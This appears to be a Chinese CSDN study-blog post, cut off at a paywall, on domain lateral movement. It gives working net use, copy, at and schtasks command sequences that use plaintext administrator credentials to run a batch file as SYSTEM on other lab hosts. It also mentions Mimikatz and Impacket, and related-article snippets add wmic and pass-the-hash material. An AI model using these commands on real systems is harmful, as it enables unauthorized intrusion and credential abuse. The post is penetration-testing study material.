内网安全学习(二)---横向渗透

已于 2022-02-28 18:37:07 修改
阅读量4.1k 收藏 13
点赞数 1
分类专栏: 内网安全 文章标签: 安全 web安全 网络
于 2022-02-09 00:21:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_sjq_/article/details/122803274
版权
本文介绍了在内网安全环境中,如何利用AT和SCHTASKS命令进行横向渗透。首先,通过信息收集获取用户凭证,然后利用MINIKATZ得到明文密码。接着,使用这些信息创建计划任务在远程主机上执行命令。此外,还提到了IMPACKET工具,它支持明文和HASH传递,并具备提权功能,但可能受杀毒软件影响。最后,文章展示了结合MIMIKatz和批量探测来寻找同密码主机的方法,强调了灵活运用各种资源和技巧进行内网渗透的重要性。
摘要由CSDN通过智能技术生成

域横向批量 at&schtasks&impacket

在这里插入图片描述

权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。

1.横向渗透—明文传递at&schtasks

在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机?

这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。

[at] & [schtasks]命令(利用点就是两者都是基于定时任务的攻击):

#at < Windows2012 成立条件
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad
ministrator # 建立 ipc 连接:
copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务

#schtasks >=Windows2012  成立条件
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad
ministrator # 建立 ipc 连接:
copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务,对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks
最低0.47元/天 解锁文章
暮w光
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网安全学习(三)---横向渗透
qi_SJQ_的博客
02-09 1060
横向 smb&wmi 明文或 hash 传递 1.前置知识: 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。 Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。 针对以上情况,我们提供了4种方式解决此类问题: 1.利用哈希hash传递(pth,ptk等)进行移动。 2.利用其他服务协议(SMB,WMI等)进行哈希移动。 3.利用注册表操作开启Wdigest Auth值进行获取。 4.利用工具或第三方平台(
内网渗透——横向移动
LainWith的博客
10-09 2425
目录环境利用Windows计划任务【借助明文账密】利用 at 建立连接利用 schtasks 建立连接哈希值传递攻击哈希传递攻击适用情况知识背景PTH漏洞原理实操PTKPTT——MS14-068方式1:使用mimikatz方式2:使用kekeo方式3:利用本地票据(需管理员权限)Impacket中的Atexec【支持明文&哈希】其他协议——SMB服务利用使用psexec使用smbexec【支持明文&哈希】其他协议——WMI服务利用【支持明文&哈希】1. 自带WMIC命令,明文传递,无
红蓝对抗下的内网横向移动渗透技术详解
最新发布
lurenjia404的博客
07-02 1987
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部网络之中,那么内网之中所有的安全防护设备将会形同虚设,红队人员在内网之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内网横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内网安全体系建设引起更多的重视和思考。
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 3334
内网渗透横向渗透
内网渗透----横向移动
浅笑996的博客
05-31 1156
SMB WMI 使用wmic查询远程主机进程信息: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process list brief 创建进程: wmic /node:192.168.91.131 /user:Administrator /password:ABCabc123 process cal...
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 5060
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
攻击者可以利用IPC$连接来控制其他主机,实现内网横向渗透。例如,通过`net use`命令可以与目标机器建立IPC连接,如`net use \\192.168.160.135\ipc$ "W2ngluoanquan" /user:HACKBIJI\Administrator`,这允许攻击者...
AHZY-内网安全攻防2020-01-12 第一章节ppt
08-21
内网安全网络安全的重要组成部分,尤其对于企业及组织而言,内网往往承载着核心业务和敏感数据,因此内网安全的防护显得尤为重要。本篇文章主要介绍了内网安全攻防的一些关键知识点,包括系统服务权限配置错误、...
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4299
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTH: PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
内网横向渗透
weixin_58782362的博客
09-28 511
因为在目标主机上面上传套件在实战中不实用,可能照成数据包丢失,也可能被查杀,也有可能目标主机没有相对的语言解析,所以最好的办法就是直接使用代理。建立ipc链接到目标主机--拷贝要执行的命令脚本到目标主机--查看目标时间、创建计划任务定时执行拷贝到的脚本--删除ipc链接。外部:(交互式,外人开发工具),本地使用./administartor,域主机使用god/administartor。下载对应release,建立socks连接,设置socks代理,配置规则,调用!内部:(交互式windows官方工具)
内网渗透技巧
05-31
内网渗透技巧思路篇,懂得安全的小伙伴可以下载看看。
内网渗透-内网横向移动的九种方式
lza20001103的博客
04-14 1712
内网横向移动的九种方式
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1673
内网环境下的横向移动总结
内网渗透系列:横向渗透方法小结
闵行小鱼塘
08-04 4310
本文学习并小结下横向渗透的方法
Windows域横向渗透
yanhong86的博客
09-20 3414
环境拓扑 我们的目的是获取redhook.DA域的一个可用的账户,当前攻击者已在公司网络内,但并未在同一个子网。 Compromising Client 1 假设我们已经获取到了Client1的登陆凭据,如果网络足够大,你可以发现存储在某处网络共享上面的其他凭据(通过批量的脚本:vbs,ps1,.net等等)。关于怎么访问网络,你可以使用Cobalt Strike框架。
内网渗透----域内横向移动
浅笑996的博客
12-20 6198
0x01.MS14-068 kerkeo工具 https://github.com/gentilkiwi/kekeo ) klist klist purge 删除所有票据 直接访问域控制器的C盘目录: dir \\qianxiao996-dm.qianxiao996.com\C$ 查看本机用户信息,记录用户名与SID号 whoami /all SID : S-1-5-21-2...
企业内网渗透横向攻击的一种思路
Sven的忘却日记
08-09 2256
以前老东家有个员工不小心点开了Emotet木马,不久后,全体员工收到了一封带有病毒附件的钓鱼邮件,发件人账号正式该员工的邮件账户。 最近在看Black Hat USA 2019大会 第一天的PPT,其中一篇主题《us-19-Joly-Hunting-For-Bugs-Catching-Dragons.pdf》 里面介绍了使用C#调用Outlook的COM库,并以当前登陆邮件账户,给指定邮箱发送邮件...
渗透测试之内网横向渗透
qq_29864185的博客
07-01 4034
内网横向渗透 当我们在获取了外网服务器的权限,进入该系统后,我们要想尽办法从该服务器上查找到我们想要的信息。 对于windows主机,我们应该多去翻翻目录,或许能有很多意想不到的结果。很多人习惯把账号密码等容易忘的东西存放在备忘录中,或者是桌面上。我们还可以查找数据库的连接文件,查看数据库的连接账号密码等敏感信息。当我们获得了windows主机的账号密码,或者是自己创建了新用户后,我们为了不被网站管理员发现和不破坏服务器。我们尽量不要使用远程桌面。因为使用远程桌面动静比较大,如果此时服务器管理员也在登
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值